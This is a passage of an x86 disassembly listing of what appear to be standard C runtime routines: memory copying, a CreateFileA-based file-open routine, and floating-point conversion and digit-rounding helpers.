lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_41D3F0
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41D3E4
std
rep movsd
cld
jmp ds:off_41D508[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41D3E4: ; CODE XREF: sub_41D220+1B5�j
; sub_41D220+210�j ...
neg ecx
jmp ds:off_41D4B8[ecx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41D3F0: ; CODE XREF: sub_41D220+1AA�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_41D408
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_41D408+4[eax*4]
; ---------------------------------------------------------------------------
loc_41D408: ; CODE XREF: sub_41D220+1DA�j
; DATA XREF: sub_41D220+1E1�r
jmp ds:off_41D508[ecx*4]
; ---------------------------------------------------------------------------
align 10h
sbb al, 0D4h
inc ecx
add [eax-2Ch], al
inc ecx
add [eax-2Ch], ch
inc ecx
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_41D3E4
std
rep movsd
cld
jmp ds:off_41D508[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_41D3E4
std
rep movsd
cld
jmp ds:off_41D508[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_41D3E4
std
rep movsd
cld
jmp ds:off_41D508[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41D4BC
dd offset loc_41D4C4
dd offset loc_41D4CC
dd offset loc_41D4D4
dd offset loc_41D4DC
dd offset loc_41D4E4
dd offset loc_41D4EC
off_41D4B8 dd offset loc_41D4FF ; DATA XREF: sub_41D220+1C6�r
; ---------------------------------------------------------------------------
loc_41D4BC: ; DATA XREF: sub_41D220+27C�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_41D4C4: ; DATA XREF: sub_41D220+280�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_41D4CC: ; DATA XREF: sub_41D220+284�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_41D4D4: ; DATA XREF: sub_41D220+288�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_41D4DC: ; DATA XREF: sub_41D220+28C�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_41D4E4: ; DATA XREF: sub_41D220+290�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_41D4EC: ; DATA XREF: sub_41D220+294�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41D4FF: ; CODE XREF: sub_41D220+1C6�j
; DATA XREF: sub_41D220:off_41D4B8�o
jmp ds:off_41D508[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41D508 dd offset loc_41D518 ; DATA XREF: sub_41D220+1BB�r
; sub_41D220:loc_41D408�r ...
dd offset loc_41D520
dd offset loc_41D530
dd offset loc_41D544
; ---------------------------------------------------------------------------
loc_41D518: ; CODE XREF: sub_41D220+1BB�j
; sub_41D220:loc_41D408�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41D520: ; CODE XREF: sub_41D220+1BB�j
; sub_41D220:loc_41D408�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41D530: ; CODE XREF: sub_41D220+1BB�j
; sub_41D220:loc_41D408�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41D544: ; CODE XREF: sub_41D220+1BB�j
; sub_41D220:loc_41D408�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_41D220 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D55D proc near ; CODE XREF: sub_41D844+28�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
mov edx, [ebp+arg_C]
push ebx
push esi
xor esi, esi
test dl, dl
mov [ebp+var_1C], 0Ch
mov [ebp+var_18], esi
jns short loc_41D581
mov [ebp+var_14], esi
mov [ebp+var_1], 10h
jmp short loc_41D58C
; ---------------------------------------------------------------------------
loc_41D581: ; CODE XREF: sub_41D55D+19�j
and [ebp+var_1], 0
mov [ebp+var_14], 1
loc_41D58C: ; CODE XREF: sub_41D55D+22�j
mov eax, 8000h
test edx, eax
jnz short loc_41D5A6
test dh, 40h
jnz short loc_41D5A2
cmp dword_47C5E0, eax
jz short loc_41D5A6
loc_41D5A2: ; CODE XREF: sub_41D55D+3B�j
or [ebp+var_1], 80h
loc_41D5A6: ; CODE XREF: sub_41D55D+36�j
; sub_41D55D+43�j
push 3
mov eax, edx
pop ebx
and eax, ebx
sub eax, esi
jz short loc_41D5C9
dec eax
jz short loc_41D5C0
dec eax
jnz short loc_41D5E4
mov [ebp+var_10], 0C0000000h
jmp short loc_41D5D0
; ---------------------------------------------------------------------------
loc_41D5C0: ; CODE XREF: sub_41D55D+55�j
mov [ebp+var_10], 40000000h
jmp short loc_41D5D0
; ---------------------------------------------------------------------------
loc_41D5C9: ; CODE XREF: sub_41D55D+52�j
mov [ebp+var_10], 80000000h
loc_41D5D0: ; CODE XREF: sub_41D55D+61�j
; sub_41D55D+6A�j
cmp ecx, 10h
jz short loc_41D615
cmp ecx, 20h
jz short loc_41D60C
cmp ecx, 30h
jz short loc_41D603
cmp ecx, 40h
jz short loc_41D5FE
loc_41D5E4: ; CODE XREF: sub_41D55D+58�j
call sub_419600
mov dword ptr [eax], 16h
call sub_419609
mov [eax], esi
or eax, 0FFFFFFFFh
jmp loc_41D7F5
; ---------------------------------------------------------------------------
loc_41D5FE: ; CODE XREF: sub_41D55D+85�j
mov [ebp+var_8], ebx
jmp short loc_41D618
; ---------------------------------------------------------------------------
loc_41D603: ; CODE XREF: sub_41D55D+80�j
mov [ebp+var_8], 2
jmp short loc_41D618
; ---------------------------------------------------------------------------
loc_41D60C: ; CODE XREF: sub_41D55D+7B�j
mov [ebp+var_8], 1
jmp short loc_41D618
; ---------------------------------------------------------------------------
loc_41D615: ; CODE XREF: sub_41D55D+76�j
mov [ebp+var_8], esi
loc_41D618: ; CODE XREF: sub_41D55D+A4�j
; sub_41D55D+AD�j ...
mov eax, edx
mov edx, 700h
and eax, edx
mov ecx, 400h
cmp eax, ecx
push edi
mov edi, 100h
jg short loc_41D65F
jz short loc_41D65A
cmp eax, esi
jz short loc_41D65A
cmp eax, edi
jz short loc_41D651
cmp eax, 200h
jz short loc_41D68B
cmp eax, 300h
jnz short loc_41D671
mov [ebp+var_C], 2
jmp short loc_41D69B
; ---------------------------------------------------------------------------
loc_41D651: ; CODE XREF: sub_41D55D+DB�j
mov [ebp+var_C], 4
jmp short loc_41D69B
; ---------------------------------------------------------------------------
loc_41D65A: ; CODE XREF: sub_41D55D+D3�j
; sub_41D55D+D7�j
mov [ebp+var_C], ebx
jmp short loc_41D69B
; ---------------------------------------------------------------------------
loc_41D65F: ; CODE XREF: sub_41D55D+D1�j
cmp eax, 500h
jz short loc_41D694
cmp eax, 600h
jz short loc_41D68B
cmp eax, edx
jz short loc_41D694
loc_41D671: ; CODE XREF: sub_41D55D+E9�j
call sub_419600
mov dword ptr [eax], 16h
call sub_419609
mov [eax], esi
loc_41D683: ; CODE XREF: sub_41D55D+2E2�j
or eax, 0FFFFFFFFh
jmp loc_41D7F4
; ---------------------------------------------------------------------------
loc_41D68B: ; CODE XREF: sub_41D55D+E2�j
; sub_41D55D+10E�j
mov [ebp+var_C], 5
jmp short loc_41D69B
; ---------------------------------------------------------------------------
loc_41D694: ; CODE XREF: sub_41D55D+107�j
; sub_41D55D+112�j
mov [ebp+var_C], 1
loc_41D69B: ; CODE XREF: sub_41D55D+F2�j
; sub_41D55D+FB�j ...
mov eax, [ebp+arg_C]
test eax, edi
mov esi, 80h
jz short loc_41D6B9
mov ecx, dword_47C1A0
not ecx
and ecx, [ebp+arg_10]
test cl, cl
js short loc_41D6B9
xor esi, esi
inc esi
loc_41D6B9: ; CODE XREF: sub_41D55D+148�j
; sub_41D55D+157�j
test al, 40h
jz short loc_41D6D4
or byte ptr [ebp+var_10+2], 1
or esi, 4000000h
cmp dword_47C1A4, 2
jnz short loc_41D6D4
or [ebp+var_8], 4
loc_41D6D4: ; CODE XREF: sub_41D55D+15E�j
; sub_41D55D+171�j
test ah, 10h
jz short loc_41D6DB
or esi, edi
loc_41D6DB: ; CODE XREF: sub_41D55D+17A�j
test al, 20h
jz short loc_41D6E7
or esi, 8000000h
jmp short loc_41D6F1
; ---------------------------------------------------------------------------
loc_41D6E7: ; CODE XREF: sub_41D55D+180�j
test al, 10h
jz short loc_41D6F1
or esi, 10000000h
loc_41D6F1: ; CODE XREF: sub_41D55D+188�j
; sub_41D55D+18C�j
call sub_41CDF1
mov edi, eax
or ebx, 0FFFFFFFFh
cmp edi, ebx
jnz short loc_41D719
call sub_419600
mov dword ptr [eax], 18h
call sub_419609
and dword ptr [eax], 0
loc_41D712: ; CODE XREF: sub_41D55D+208�j
mov eax, ebx
jmp loc_41D7F4
; ---------------------------------------------------------------------------
loc_41D719: ; CODE XREF: sub_41D55D+1A0�j
mov eax, [ebp+arg_0]
push 0
push esi
push [ebp+var_C]
mov dword ptr [eax], 1
mov eax, [ebp+arg_4]
mov [eax], edi
lea eax, [ebp+var_1C]
push eax
push [ebp+var_8]
push [ebp+var_10]
push [ebp+arg_8]
call ds:dword_420044 ; CreateFileA
mov esi, eax
cmp esi, ebx
jz short loc_41D758
push esi
call ds:dword_4201D0 ; GetFileType
test eax, eax
jnz short loc_41D767
push esi
call ds:dword_42003C ; CloseHandle
loc_41D758: ; CODE XREF: sub_41D55D+1E7�j
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
call sub_419612
pop ecx
jmp short loc_41D712
; ---------------------------------------------------------------------------
loc_41D767: ; CODE XREF: sub_41D55D+1F2�j
cmp eax, 2
jnz short loc_41D772
or [ebp+var_1], 40h
jmp short loc_41D77B
; ---------------------------------------------------------------------------
loc_41D772: ; CODE XREF: sub_41D55D+20D�j
cmp eax, 3
jnz short loc_41D77B
or [ebp+var_1], 8
loc_41D77B: ; CODE XREF: sub_41D55D+213�j
; sub_41D55D+218�j
push esi
push edi
call sub_41CC20
or [ebp+var_1], 1
mov eax, edi
sar eax, 5
lea ebx, ds:47C620h[eax*4]
mov eax, edi
and eax, 1Fh
lea esi, [eax+eax*8]
mov al, [ebp+var_1]
pop ecx
pop ecx
mov ecx, [ebx]
shl esi, 2
mov [ebp+var_1], al
and [ebp+var_1], 48h
mov [esi+ecx+4], al
jnz short loc_41D7DD
test al, al
jns short loc_41D7DD
test byte ptr [ebp+arg_C], 2
jz short loc_41D7DD
push 2
push 0FFFFFFFFh
push edi
call sub_41B348
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_41D7F9
call sub_419609
cmp dword ptr [eax], 83h
jnz short loc_41D838
loc_41D7DD: ; CODE XREF: sub_41D55D+252�j
; sub_41D55D+256�j ...
cmp [ebp+var_1], 0
jnz short loc_41D7F2
test byte ptr [ebp+arg_C], 8
jz short loc_41D7F2
mov eax, [ebx]
lea eax, [esi+eax+4]
or byte ptr [eax], 20h
loc_41D7F2: ; CODE XREF: sub_41D55D+284�j
; sub_41D55D+28A�j
mov eax, edi
loc_41D7F4: ; CODE XREF: sub_41D55D+129�j
; sub_41D55D+1B7�j
pop edi
loc_41D7F5: ; CODE XREF: sub_41D55D+9C�j
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41D7F9: ; CODE XREF: sub_41D55D+271�j
and [ebp+var_2], 0
push 1
lea eax, [ebp+var_2]
push eax
push edi
call sub_418EBA
add esp, 0Ch
test eax, eax
jnz short loc_41D826
cmp [ebp+var_2], 1Ah
jnz short loc_41D826
push [ebp+var_10]
push edi
call sub_41E66E
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jz short loc_41D838
loc_41D826: ; CODE XREF: sub_41D55D+2B1�j
; sub_41D55D+2B7�j
push 0
push 0
push edi
call sub_41B348
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jnz short loc_41D7DD
loc_41D838: ; CODE XREF: sub_41D55D+27E�j
; sub_41D55D+2C7�j
push edi
call sub_417C89
pop ecx
jmp loc_41D683
sub_41D55D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D844 proc near ; CODE XREF: sub_419498+137�p
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 14h
push offset stru_429AD0
call __SEH_prolog
and [ebp+var_1C], 0
and [ebp+ms_exc.disabled], 0
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
mov ecx, [ebp+arg_8]
call sub_41D55D
add esp, 14h
mov [ebp+var_24], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41D889
mov eax, [ebp+var_24]
call __SEH_epilog
retn
sub_41D844 endp
; =============== S U B R O U T I N E =======================================
sub_41D889 proc near ; CODE XREF: sub_41D844+37�p
; DATA XREF: .rdata:stru_429AD0�o
cmp dword ptr [ebp-1Ch], 0
jz short locret_41D898
push dword ptr [ebp-20h]
call sub_41CDCF
pop ecx
locret_41D898: ; CODE XREF: sub_41D889+4�j
retn
sub_41D889 endp
; =============== S U B R O U T I N E =======================================
sub_41D899 proc near ; CODE XREF: sub_41D918+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push 20h
pop ecx
cdq
idiv ecx
push 1Fh
pop ecx
sub ecx, edx
or edx, 0FFFFFFFFh
shl edx, cl
mov ecx, [esp+arg_0]
not edx
test [ecx+eax*4], edx
jz short loc_41D8C1
loc_41D8B8: ; CODE XREF: sub_41D899+26�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41D8BB: ; CODE XREF: sub_41D899+2C�j
cmp dword ptr [ecx+eax*4], 0
jnz short loc_41D8B8
loc_41D8C1: ; CODE XREF: sub_41D899+1D�j
inc eax
cmp eax, 3
jl short loc_41D8BB
xor eax, eax
inc eax
retn
sub_41D899 endp
; =============== S U B R O U T I N E =======================================
sub_41D8CB proc near ; CODE XREF: sub_41D918+42�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
push edi
push 20h
pop ecx
cdq
idiv ecx
mov edi, [esp+8+arg_0]
mov esi, eax
lea eax, [edi+esi*4]
push eax
push 1Fh
pop ecx
sub ecx, edx
xor edx, edx
inc edx
shl edx, cl
push edx
push dword ptr [eax]
call sub_41E7A9
add esp, 0Ch
dec esi
js short loc_41D915
lea edi, [edi+esi*4]
loc_41D8FC: ; CODE XREF: sub_41D8CB+48�j
test eax, eax
jz short loc_41D915
push edi
push 1
push dword ptr [edi]
call sub_41E7A9
add esp, 0Ch
dec esi
sub edi, 4
test esi, esi
jge short loc_41D8FC
loc_41D915: ; CODE XREF: sub_41D8CB+2C�j
; sub_41D8CB+33�j
pop edi
pop esi
retn
sub_41D8CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D918 proc near ; CODE XREF: sub_41DA39+79�p
; sub_41DA39+C2�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
dec edi
push 20h
lea eax, [edi+1]
pop ecx
cdq
idiv ecx
push 1Fh
pop esi
sub esi, edx
xor edx, edx
inc edx
mov ecx, esi
shl edx, cl
mov ebx, eax
mov eax, [ebp+arg_0]
test [eax+ebx*4], edx
jz short loc_41D967
lea ecx, [edi+1]
push ecx
push eax
call sub_41D899
test eax, eax
pop ecx
pop ecx
jnz short loc_41D964
push edi
push [ebp+arg_0]
call sub_41D8CB
pop ecx
pop ecx
mov [ebp+var_4], eax
loc_41D964: ; CODE XREF: sub_41D918+3C�j
mov eax, [ebp+arg_0]
loc_41D967: ; CODE XREF: sub_41D918+2C�j
or edx, 0FFFFFFFFh
mov ecx, esi
shl edx, cl
push 3
pop ecx
and [eax+ebx*4], edx
inc ebx
cmp ebx, ecx
jge short loc_41D982
lea edi, [eax+ebx*4]
sub ecx, ebx
xor eax, eax
rep stosd
loc_41D982: ; CODE XREF: sub_41D918+5F�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_41D918 endp
; =============== S U B R O U T I N E =======================================
sub_41D98A proc near ; CODE XREF: sub_41DA39+6D�p
; sub_41DA39+AC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push 3
pop edx
sub ecx, eax
push esi
loc_41D998: ; CODE XREF: sub_41D98A+17�j
mov esi, [eax]
mov [ecx+eax], esi
add eax, 4
dec edx
jnz short loc_41D998
pop esi
retn
sub_41D98A endp
; =============== S U B R O U T I N E =======================================
sub_41D9A5 proc near ; CODE XREF: sub_41DA39+4D�p
arg_0 = dword ptr 4
xor eax, eax
loc_41D9A7: ; CODE XREF: sub_41D9A5+10�j
mov ecx, [esp+arg_0]
cmp dword ptr [ecx+eax*4], 0
jnz short loc_41D9BB
inc eax
cmp eax, 3
jl short loc_41D9A7
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41D9BB: ; CODE XREF: sub_41D9A5+A�j
xor eax, eax
retn
sub_41D9A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D9BE proc near ; CODE XREF: sub_41DA39+B6�p
; sub_41DA39+D0�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
push 20h
pop esi
cdq
mov ecx, esi
idiv ecx
mov ebx, [ebp+arg_0]
or edi, 0FFFFFFFFh
mov [ebp+arg_4], esi
mov ecx, edx
shl edi, cl
mov [ebp+var_8], eax
xor eax, eax
sub [ebp+arg_4], edx
not edi
mov [ebp+var_4], eax
loc_41D9EC: ; CODE XREF: sub_41D9BE+51�j
mov esi, [ebx+eax*4]
mov ecx, esi
and ecx, edi
mov [ebp+var_C], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+arg_4]
or esi, [ebp+var_4]
mov [ebx+eax*4], esi
mov esi, [ebp+var_C]
shl esi, cl
inc eax
cmp eax, 3
mov [ebp+var_4], esi
jl short loc_41D9EC
push 2
pop eax
mov ecx, eax
sub ecx, [ebp+var_8]
lea ecx, [ebx+ecx*4]
loc_41DA1C: ; CODE XREF: sub_41D9BE+74�j
cmp eax, [ebp+var_8]
jl short loc_41DA28
mov edx, [ecx]
mov [ebx+eax*4], edx
jmp short loc_41DA2C
; ---------------------------------------------------------------------------
loc_41DA28: ; CODE XREF: sub_41D9BE+61�j
and dword ptr [ebx+eax*4], 0
loc_41DA2C: ; CODE XREF: sub_41D9BE+68�j
dec eax
sub ecx, 4
test eax, eax
jge short loc_41DA1C
pop edi
pop esi
pop ebx
leave
retn
sub_41D9BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DA39 proc near ; CODE XREF: sub_41DB91+D�p
; sub_41DBA7+D�p
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_0]
movzx ecx, word ptr [eax+0Ah]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, ecx
and ecx, 8000h
mov [ebp+arg_0], ecx
mov ecx, [eax+6]
mov [ebp+var_C], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
shl eax, 10h
and edi, 7FFFh
sub edi, 3FFFh
cmp edi, 0FFFFC001h
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
mov [ebp+var_8], ecx
push eax
jnz short loc_41DAA2
xor ebx, ebx
call sub_41D9A5
test eax, eax
pop ecx
jnz loc_41DB51
lea edi, [ebp+var_C]
stosd
stosd
stosd
loc_41DA9A: ; CODE XREF: sub_41DA39+DA�j
push 2
pop eax
jmp loc_41DB53
; ---------------------------------------------------------------------------
loc_41DAA2: ; CODE XREF: sub_41DA39+49�j
lea eax, [ebp+var_18]
push eax
call sub_41D98A
push dword ptr [esi+8]
lea eax, [ebp+var_C]
push eax
call sub_41D918
add esp, 10h
test eax, eax
jz short loc_41DABF
inc edi
loc_41DABF: ; CODE XREF: sub_41DA39+83�j
mov eax, [esi+4]
mov ecx, eax
sub ecx, [esi+8]
cmp edi, ecx
jge short loc_41DAD5
xor eax, eax
lea edi, [ebp+var_C]
stosd
stosd
stosd
jmp short loc_41DB11
; ---------------------------------------------------------------------------
loc_41DAD5: ; CODE XREF: sub_41DA39+90�j
cmp edi, eax
jg short loc_41DB15
sub eax, edi
mov edi, eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
call sub_41D98A
lea eax, [ebp+var_C]
push edi
push eax
call sub_41D9BE
push dword ptr [esi+8]
lea eax, [ebp+var_C]
push eax
call sub_41D918
mov eax, [esi+0Ch]
inc eax
push eax
lea eax, [ebp+var_C]
push eax
call sub_41D9BE
add esp, 20h
loc_41DB11: ; CODE XREF: sub_41DA39+9A�j
xor ebx, ebx
jmp short loc_41DA9A
; ---------------------------------------------------------------------------
loc_41DB15: ; CODE XREF: sub_41DA39+9E�j
cmp edi, [esi]
push dword ptr [esi+0Ch]
jl short loc_41DB3D
xor eax, eax
lea edi, [ebp+var_C]
stosd
stosd
stosd
or byte ptr [ebp+var_C+3], 80h
lea eax, [ebp+var_C]
push eax
call sub_41D9BE
mov ebx, [esi+14h]
add ebx, [esi]
pop ecx
xor eax, eax
pop ecx
inc eax
jmp short loc_41DB53
; ---------------------------------------------------------------------------
loc_41DB3D: ; CODE XREF: sub_41DA39+E1�j
mov ebx, [esi+14h]
and byte ptr [ebp+var_C+3], 7Fh
lea eax, [ebp+var_C]
push eax
add ebx, edi
call sub_41D9BE
pop ecx
pop ecx
loc_41DB51: ; CODE XREF: sub_41DA39+55�j
xor eax, eax
loc_41DB53: ; CODE XREF: sub_41DA39+64�j
; sub_41DA39+102�j
push 1Fh
pop ecx
sub ecx, [esi+0Ch]
mov esi, [esi+10h]
shl ebx, cl
mov ecx, [ebp+arg_0]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or ebx, ecx
or ebx, [ebp+var_C]
cmp esi, 40h
jnz short loc_41DB82
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_8]
mov [ecx+4], ebx
mov [ecx], edx
jmp short loc_41DB8C
; ---------------------------------------------------------------------------
loc_41DB82: ; CODE XREF: sub_41DA39+13A�j
cmp esi, 20h
jnz short loc_41DB8C
mov ecx, [ebp+arg_4]
mov [ecx], ebx
loc_41DB8C: ; CODE XREF: sub_41DA39+147�j
; sub_41DA39+14C�j
pop edi
pop esi
pop ebx
leave
retn
sub_41DA39 endp
; =============== S U B R O U T I N E =======================================
sub_41DB91 proc near ; CODE XREF: sub_41DBBD+2E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_42E210
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41DA39
add esp, 0Ch
retn
sub_41DB91 endp
; =============== S U B R O U T I N E =======================================
sub_41DBA7 proc near ; CODE XREF: sub_41DC00+2E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_42E228
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41DA39
add esp, 0Ch
retn
sub_41DBA7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DBBD proc near ; CODE XREF: sub_419848+12�p
var_14 = byte ptr -14h
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_42DEA8
xor eax, [ebp+4]
mov [ebp+var_4], eax
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_14]
push eax
call sub_41E967
push [ebp+arg_0]
lea eax, [ebp+var_14]
push eax
call sub_41DB91
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 24h
call sub_41A1F6
leave
retn
sub_41DBBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DC00 proc near ; CODE XREF: sub_419848+2D�p
var_14 = byte ptr -14h
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_42DEA8
xor eax, [ebp+4]
mov [ebp+var_4], eax
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_14]
push eax
call sub_41E967
push [ebp+arg_0]
lea eax, [ebp+var_14]
push eax
call sub_41DBA7
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 24h
call sub_41A1F6
leave
retn
sub_41DC00 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DC43 proc near ; CODE XREF: sub_419951+4D�p
; sub_419A61+41�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_8]
mov ecx, [edx+0Ch]
push ebx
mov ebx, [ebp+arg_4]
test ebx, ebx
push esi
mov esi, [ebp+arg_0]
push edi
lea edi, [esi+1]
mov byte ptr [esi], 30h
mov eax, edi
jle short loc_41DC80
mov [ebp+arg_0], ebx
xor ebx, ebx
loc_41DC66: ; CODE XREF: sub_41DC43+38�j
mov dl, [ecx]
test dl, dl
jz short loc_41DC72
movsx edx, dl
inc ecx
jmp short loc_41DC75
; ---------------------------------------------------------------------------
loc_41DC72: ; CODE XREF: sub_41DC43+27�j
push 30h
pop edx
loc_41DC75: ; CODE XREF: sub_41DC43+2D�j
mov [eax], dl
inc eax
dec [ebp+arg_0]
jnz short loc_41DC66
mov edx, [ebp+arg_8]
loc_41DC80: ; CODE XREF: sub_41DC43+1C�j
and byte ptr [eax], 0
test ebx, ebx
jl short loc_41DC99
cmp byte ptr [ecx], 35h
jl short loc_41DC99
jmp short loc_41DC91
; ---------------------------------------------------------------------------
loc_41DC8E: ; CODE XREF: sub_41DC43+52�j
mov byte ptr [eax], 30h
loc_41DC91: ; CODE XREF: sub_41DC43+49�j
dec eax
cmp byte ptr [eax], 39h
jz short loc_41DC8E
inc byte ptr [eax]
loc_41DC99: ; CODE XREF: sub_41DC43+42�j
; sub_41DC43+47�j
cmp byte ptr [esi], 31h
jnz short loc_41DCA3
inc dword ptr [edx+4]
jmp short loc_41DCB5
; ---------------------------------------------------------------------------
loc_41DCA3: ; CODE XREF: sub_41DC43+59�j
push edi
call sub_4179C0
inc eax
push eax
push edi
push esi
call sub_41D220
add esp, 10h
loc_41DCB5: ; CODE XREF: sub_41DC43+5E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41DC43 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DCBA proc near ; CODE XREF: sub_41DD74+1B�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
xor eax, eax
mov ax, [edx+6]
push ebx
push esi
push edi
mov edi, 7FFh
mov esi, 80000000h
mov [ebp+var_4], esi
mov ecx, eax
shr ecx, 4
and eax, 8000h
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
and eax, 0FFFFFh
test ebx, ebx
jz short loc_41DD0A
cmp ebx, edi
jz short loc_41DD03
lea edi, [ecx+3C00h]
jmp short loc_41DD2B
; ---------------------------------------------------------------------------
loc_41DD03: ; CODE XREF: sub_41DCBA+3F�j
mov edi, 7FFFh
jmp short loc_41DD2B
; ---------------------------------------------------------------------------
loc_41DD0A: ; CODE XREF: sub_41DCBA+3B�j
xor ebx, ebx
